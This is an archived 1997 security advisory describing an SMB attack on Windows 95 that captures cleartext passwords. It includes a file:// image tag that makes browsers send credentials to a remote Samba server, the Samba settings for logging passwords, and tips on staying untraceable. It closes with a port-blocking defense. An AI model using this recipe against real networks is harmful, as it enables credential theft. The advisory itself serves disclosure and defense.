home
***
CD-ROM
|
disk
|
FTP
|
other
***
search
/
Hacks & Cracks
/
Hacks_and_Cracks.iso
/
hackersclub
/
km
/
library
/
hack
/
smb_win95.txt
< prev
next >
Wrap
Text File
|
1998-03-25
|
4KB
|
81 lines
SMB Attacks on Windows 95
VERSIONS AFFECTED
Windows 95, with and without Internet Explorer.
DESCRIPTION
Apparently a new problem has been discovered that allows a malicious Web developer to snag a Windows 95
password in cleartext, given only the IP address and Workgroup name. The action could be done in such a
way that it leaves no noticeable trace what-so-ever, which makes it incredibly dangerous indeed.
A Master Browser can be indirectly used as a tool against the machines it serves by introducing a hostile
host in to the browse list. This exploit requires the use of a SAMBA server, which is a Unix based rendition of
an SMB compatible server.
Samba servers are capable of announcing themselves to a remote network (workgroup) on a different subnet,
given the workgroup name. An intruder may use this technique in two ways to gain access to a username
and password. They could introduce a share from the system they place in the browse list, and wait for a
user to make an attempt at accessing it - at which point the username and password are transmitted. They
could also embed the file:// tag into a Web page and wait for a user to arrive at that page - at which point the
Web browser would initiate a connection to the remote server named in the file:// tag, and promptly transmit
the username and password. Sample HTML tag:
<img src=file://\\testsystem/testshare/testfile.gif>
TESTING
* Compile Samba using -DDEBUG_PASSWORD
* Employ the remote announce option in the smb.cfg file, specifying the remote host or broadcast address,
and workgroup name of the network you wish to test. Sample:
workgroup = TEST
preferred master = yes
domain master = yes
security = user
debug level = 100
remote announce = 10.0.0.255/WORKGROUP_NAME
* Establish a share on the Samba server. Sample:
[testt]
path = /tmp
public = no
browsable = yes
* If you wish, place one or more files in the directory, then start the smbd daemon. At this point, any SMB
related traffic (e.g. browsing the local machine) will cause the Samba server to announce itself to the remote
network specified. If the remote network is succesfully contacted, the Samba server may be added to that
network's browse list.
Later, checking the Samba log will reveal any information it has collected about usernames and passwords.
Entries will look similar to this:
checking user=[username] pass=[password]
DEFENSE
Even though you need to have the remote network's workgroup name previous to this type of attack, keep in
mind that this name could be easily obtained using the Windows nbtstat command.
Also take note that it is VERY easy for a perpetrator to completely hide themselves during this attack by
making a few minor adjustments to their hostname and /etc/hosts file. In otherwords, this could be done in an
untraceable fashion in certain instances.
To stop this type of attack from outside your network (Internet), block access to inbound traffic destined for
ports 137, 138, and 139 on your network. This does not solve problems with this type of attack coming from
inside your network.
Microsoft was informed of this problem on March 17, 1997. Watch this page for more information.
Credits
Discovered by Steve Birnbaum with help from Mark Gazit.
Additional support from Yacov Drori and Roman Lasker.
Thanks to hobbit for his paper on CIFS,
Thanks also to BioH for helping to test this, and anyone else who helped or provided ideas.
Posted here at The NT Shop March 17, 1997 - 10:40pm